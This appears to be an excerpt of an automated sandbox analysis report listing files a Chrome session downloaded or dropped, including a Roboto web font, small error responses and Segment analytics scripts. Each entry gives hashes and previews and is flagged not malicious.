                                                                                                                                                                              Preview:...........k{.H.(.}............'qz<..>.3==..G..(..../m..]kU.T......|x....T.Z...O....T.........e..]../'.o+gp.k.........F....+#..+.{..|X..J.U.`.F.0...W..7.Ie...J2.Y.~.$.L.8....$...P]4..yQ.P99..P?....?........I%....+^0..&p..2..<........Da...J....F.9<.7.*^.+1O*.0J..........h1....[....h..............u".....C%.+..\.>....T`.1....... i......8.TB(.Uh.b.{...@<y..D^.S.....n".<H.L..O..*.t........p6..\[...yCm.J.k.....b..vg....-.j.$........1....p~3.b.....n....[_c..{1WN.l~.=...........?......S.}U..g.......t..../...........|.+...-y.X\...l.....>;."....ye.\.....h..p.f.8...[/..nd.,.......X.?......-....J.....I.;....t..FSw...a7i...c..Y{.-..>a..4h.Eo..c#...O....~..d....Z..z.'...s.D..E...jb.O.F..0.VW>..]%6........x..O>E.'a0U.....w....."..9.az.6....<a.?..<qvx........ct.K..s.C3..d#..#^R.z..A..u.f..........s.....M.rb(.\v.....%.k....i.f...,C.s..bY..K#...~.>..D..j....m.71..}...37h........P{..7!@...|..ZR.]V....."...0.o....7..peCG....px..j.%r2.....R.k5m..s.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 40128, version 1.0
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):40128
                                                                                                                                                                              Entropy (8bit):7.994526034157349
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:9A01B69183A9604AB3A439E388B30501
                                                                                                                                                                              SHA1:8ED1D59003D0DBE6360481017B44665153665FBE
                                                                                                                                                                              SHA-256:20B535FA80C8189E3B87D1803038389960203A886D502BC2EF1857AFFC2F38D2
                                                                                                                                                                              SHA-512:0E6795255B6EEA00B5403FD7E3B904D52776D49AC63A31C2778361262883697943AEDCB29FEEE85694BA6F19EAA34DDDB9A5BFE7118F4A25B4757E92C331FECA
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3yUBA.woff2
                                                                                                                                                                              Preview:wOF2..............$....F..........................p.....t?HVAR...`?STAT.N'...B..~.../~.....`..i..X.0..j.6.$..,. .... ..N[{.q.v...Lw.Q..o..J...6.Z.g.F.n..g\{t....%.!3)....sS.o...$."c.^<.iZc.I]c....0+. ..I..9.H.3..B.&.....'e....5.p.R(.j~\=..Wt.{..1.[u..Fn..<.-g.3..L..o.....E.-Q.........I..-/.4....{.Uj...3.K...g.Z....0...2)%.{......gN.../f.7....o.K....^V...!j...<...gf....\XjI.<p.PJh.4....*,*.S....&.C...R..,@ba..<..z.|.X.&.(.mf.w[..l.35Mp...A.A.=d........fj...}W6..y....[...i.......!........NLND....n'"...N*k)0<n.P.......w.j..>9.vV...Z.`.$$!.".(.`ATV.,..0.]3.<.d(...-s...2.w....P@.&...-.9x7.'....Sg.N=m.=....(..))-bA<.x.......=@4qs..Ss......K...{.=H.......z...NUS....Y..6.K.......n.....F4.B....=w.....+..F3...fB..........y1...,.(...`,..&vIrP.^.fiQY..5....H.a......q...s."..\..':.xK}...fU.z.j.......$L.......f.g&....R...!.Wmew3.1%2W.'"6u..r.q"F.......~i{..9xN.g.X..NMx.H.s@.8..J.t.SP.C`-GU)G/'..6".+......f..n..Aw....r....l.<r...Cke..D....T/."..c..mj..
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):42
                                                                                                                                                                              Entropy (8bit):4.016735577283109
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:85313D55461B305C609AF67FDE23727F
                                                                                                                                                                              SHA1:B66C6000DB7908762F142014BA311A7A556A28C4
                                                                                                                                                                              SHA-256:2E1006F5CAD6CB85930C762E30BCBE9AECC8056E358F696C35CD2291B3A669C3
                                                                                                                                                                              SHA-512:58442AC472CC437EE1C42527BDB2DB313C8DBBE7F2EBB7EFB809C92AF35D404599F00512FD2E90D1CB667FEF8D31787B14DDB3CA5AC01D4541EF78321820C668
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:"Missing a required Content-Length header"
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):71723
                                                                                                                                                                              Entropy (8bit):5.331796427522331
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:A6378A93E23B431232F76FC74DCA8B18
                                                                                                                                                                              SHA1:51C28E605ABFB910D4C836F58E96723141E28B30
                                                                                                                                                                              SHA-256:265AC7549793E4B9D51F8AB19ACC8518770ACE94078790776B3AC34EB47E1BBD
                                                                                                                                                                              SHA-512:A17C714169D3A58A446F1A628286DC2D986AD2FC4981FCE8BF2BCA532AC02DCB15F054A00E53A1FCC097BBE2AF4711DF4C3198502911483F1D9A473913F214FA
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://segment.planable.io/next-integrations/integrations/vendor/commons.a61d7bea37d2de5d4b69.js.gz
                                                                                                                                                                              Preview:(window.webpackJsonp_name_Integration=window.webpackJsonp_name_Integration||[]).push([[0],{"+BL1":function(t,e,r){"use strict";function n(t){var e=t.toString();return 1===e.length?"0"+e:e}t.exports=function(t){return t.getUTCFullYear()+"-"+n(t.getUTCMonth()+1)+"-"+n(t.getUTCDate())+"T"+n(t.getUTCHours())+":"+n(t.getUTCMinutes())+":"+n(t.getUTCSeconds())+"."+String((t.getUTCMilliseconds()/1e3).toFixed(3)).slice(2,5)+"Z"}},"+VvR":function(t,e){t.exports=function(t,e){if("string"!=typeof t)throw new TypeError("String expected");e||(e=document);var r=/<([\w:]+)/.exec(t);if(!r)return e.createTextNode(t);t=t.replace(/^\s+|\s+$/g,"");var n=r[1];if("body"==n){return(i=e.createElement("html")).innerHTML=t,i.removeChild(i.lastChild)}var i,a=Object.prototype.hasOwnProperty.call(o,n)?o[n]:o._default,c=a[0],u=a[1],s=a[2];(i=e.createElement("div")).innerHTML=u+t+s;for(;c--;)i=i.lastChild;if(i.firstChild==i.lastChild)return i.removeChild(i.firstChild);var p=e.createDocumentFragment();for(;i.firstChil
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):82
                                                                                                                                                                              Entropy (8bit):4.383594884337988
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:2ECE426E3900FA6EBAD39380AEAA2539
                                                                                                                                                                              SHA1:24C4E875361BC77874B005F816D160223DC68B46
                                                                                                                                                                              SHA-256:E4CE65C3A33FDF0AD73B34857BFF62AF3A6187509551AFBFECBA345FEA02BF55
                                                                                                                                                                              SHA-512:66A11A88F239BC8AD325671B2EADDFE0F88CC1EFDD4FA08E83D2FCA2E615DB4A101B935AD89F274B606F0C6DFF41BE575708268E8FB34F897EC28F7D8024BC65
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:{. "success": false,. "message": "malformed JSON",. "code": "invalid_request".}
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2357)
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):2397
                                                                                                                                                                              Entropy (8bit):5.260126064504652
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:5AAE3F13866EED4BD7ECF378074F5AEF
                                                                                                                                                                              SHA1:8DD2F5C61C0B2979201AF84FCE168203FB487FB0
                                                                                                                                                                              SHA-256:E91BD6D37A2D6C0A38558CFE458338D7F0437252D5D4E3EBFFFA5D2BA8E5AAA2
                                                                                                                                                                              SHA-512:272CA3C00E2EE87468F7FED7BF84DD8072C5428D5B3CADBCFB7CA88CC9331D12F3CB8BFD116C79CEE640871A12052B9B2BF32473B5C109D38E7FED45142A1E98
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://segment.planable.io/next-integrations/integrations/bing-ads/2.0.1/bing-ads.dynamic.js.gz
                                                                                                                                                                              Preview:window['bing-adsDeps'] = ["/integrations/vendor/commons.a61d7bea37d2de5d4b69.js"];window['bing-adsLoader'] = function() { return window["bing-adsIntegration"]=function(t){function e(e){for(var r,i,a=e[0],p=e[1],c=e[2],f=0,d=[];f<a.length;f++)i=a[f],Object.prototype.hasOwnProperty.call(o,i)&&o[i]&&d.push(o[i][0]),o[i]=0;for(r in p)Object.prototype.hasOwnProperty.call(p,r)&&(t[r]=p[r]);for(l&&l(e);d.length;)d.shift()();return u.push.apply(u,c||[]),n()}function n(){for(var t,e=0;e<u.length;e++){for(var n=u[e],r=!0,a=1;a<n.length;a++){var p=n[a];0!==o[p]&&(r=!1)}r&&(u.splice(e--,1),t=i(i.s=n[0]))}return t}var r={},o={19:0},u=[];function i(e){if(r[e])return r[e].exports;var n=r[e]={i:e,l:!1,exports:{}};return t[e].call(n.exports,n,n.exports,i),n.l=!0,n.exports}i.m=t,i.c=r,i.d=function(t,e,n){i.o(t,e)||Object.defineProperty(t,e,{enumerable:!0,get:n})},i.r=function(t){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.defineProp
                                                                                                                                                                              No static file info